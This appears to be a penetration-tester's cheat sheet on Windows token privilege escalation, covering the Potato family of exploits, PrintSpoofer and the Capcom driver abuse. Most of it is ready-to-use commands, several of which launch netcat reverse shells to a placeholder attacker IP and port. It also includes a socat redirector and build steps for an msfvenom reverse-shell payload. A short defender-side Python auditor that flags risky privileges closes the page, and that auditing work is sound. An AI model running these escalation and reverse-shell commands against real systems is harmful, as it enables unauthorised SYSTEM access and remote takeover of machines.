# windows token exploits

## Churrasco

**REQUIREMENTS:**

* SeImpersonatePrivilege
* Windows XP, Vista, Server 2003, Server 2008

```bash
# usage
> churrasco.exe -d "nc.exe -e cmd.exe IP PORT"
```

## HotPotato

* Windows 7,8,10, Server 2008, Server 2012

## [JuicyPotato](https://github.com/ohpe/juicy-potato)

**REQUIREMENTS:**

* SeImpersonatePrivilege
* Target is older than Windows 10 1809 / Windows Server 2019
* A CLSID for the target OS: <http://ohpe.it/juicy-potato/CLSID/>
  * <http://ohpe.it/juicy-potato/CLSID/GetCLSID.ps1> can enumerate candidates on the host
* Try: `{03ca98d6-ff5d-49b8-abc6-03dd84127020}`

```bash
> JuicyPotato.exe -l 1337 -p "c:\windows\system32\cmd.exe" -a "/c PATH\nc.exe -e cmd.exe IP PORT" -t * -c CLSID
> Juicy.Potato.x86.exe -l 1337 -p "c:\users\public\kashz.exe" -t * -c CLSID

> PSExec64.exe -i -u "nt authority\local service" <shell.exe>
```

## [PrintSpoofer](https://github.com/itm4n/PrintSpoofer/releases/tag/v1.0)

**REQUIREMENTS:**

* SeImpersonatePrivilege
* Win10, Server 2016, Server 2019

```bash
> PrintSpoofer.exe -i -c cmd.exe
> PrintSpoofer.exe -c "nc.exe IP PORT -e cmd.exe"
# -i : interactive
# -c : command to run
```

## [RoguePotato](https://github.com/antonioCoco/RoguePotato)

**REQUIREMENTS:**

* SeImpersonatePrivilege
* Target is Windows 10 1809 or later / Windows Server 2019 or later

```bash
# socat redirector on the attacker host for OXID resolution; it must listen on 135
$ socat tcp-listen:135,reuseaddr,fork tcp:KALI_IP:9999
> RoguePotato.exe -r KALI_IP -e "PATH\nc.exe IP PORT -e cmd.exe" -l 9999
```

## [SeLoadDriverPrivilege](https://book.hacktricks.xyz/windows/active-directory-methodology/privileged-accounts-and-token-privileges#capcom-sys-driver-exploit)

**REQUIREMENTS:**

* Visual Studio to compile

### Steps:

1. Obtain the user's SID
   1. `Get-ADUser -Identity 'svc-print' | select SID`
   2. `(New-Object System.Security.Principal.NTAccount("svc-print")).Translate([System.Security.Principal.SecurityIdentifier]).value`
2. Clone the repo: [tandasat/ExploitCapcom/](https://github.com/tandasat/ExploitCapcom/)
3. Generate an `.exe` reverse shell with msfvenom
4. Update the path to the reverse shell (as it will sit on the target) at line 410 of `ExploitCapcom.cpp`
5. Set the build configuration to Release
6. Build the solution
7. Run `.\ExploitCapcom.exe`

## SeBackupPrivilege

* <https://github.com/giuliano108/SeBackupPrivilege>
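
As an added defender-side check (my example, not code from this page or from any of the tools above): parse `whoami /priv` output and flag the privileges this page documents as abusable, so service accounts holding them can be reviewed. It assumes English-locale output (the State column reads `Enabled`/`Disabled`); the sample output is constructed.

```python
import re
from typing import Dict, List

# Privileges this page documents as abusable, with the conditions the page gives.
# A defender auditing service accounts can use this as the review list:
# any account holding one of these should be justified or have it removed.
RISKY_PRIVILEGES = {
    "SeImpersonatePrivilege": "token impersonation: JuicyPotato (< Win10 1809 / "
                              "Server 2019), RoguePotato/PrintSpoofer (newer)",
    "SeLoadDriverPrivilege": "loading a vulnerable signed driver (Capcom.sys)",
    "SeBackupPrivilege": "file reads that bypass ACLs",
}

# One row of `whoami /priv`: name, description, state. Assumption: English
# locale, so the State column is literally Enabled/Disabled.
_ROW = re.compile(r"^(Se\w+Privilege)\s+.*?\s+(Enabled|Disabled)$")

def parse_whoami_priv(output: str) -> Dict[str, str]:
    """Return {privilege_name: state} from raw `whoami /priv` text."""
    privs: Dict[str, str] = {}
    for line in output.splitlines():
        m = _ROW.match(line.strip())
        if m:
            privs[m.group(1)] = m.group(2)
    return privs

def audit_token(output: str) -> List[Dict[str, str]]:
    """Flag held privileges that this page documents as abusable.
    'Disabled' only means the privilege is not currently enabled in the
    token; its holder can enable it at will, so it is flagged regardless."""
    return [
        {"privilege": name, "state": state, "why": RISKY_PRIVILEGES[name]}
        for name, state in parse_whoami_priv(output).items()
        if name in RISKY_PRIVILEGES
    ]

# Constructed sample of `whoami /priv` output for a service account.
SAMPLE = """\
PRIVILEGES INFORMATION
----------------------

Privilege Name                Description                               State
============================= ========================================= ========
SeChangeNotifyPrivilege       Bypass traverse checking                  Enabled
SeImpersonatePrivilege        Impersonate a client after authentication Enabled
SeBackupPrivilege             Back up files and directories             Disabled
SeIncreaseWorkingSetPrivilege Increase a process working set            Disabled
"""
```

`audit_token(SAMPLE)` returns two findings, SeImpersonatePrivilege and SeBackupPrivilege; feed it the real `whoami /priv` text captured from the account under review.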

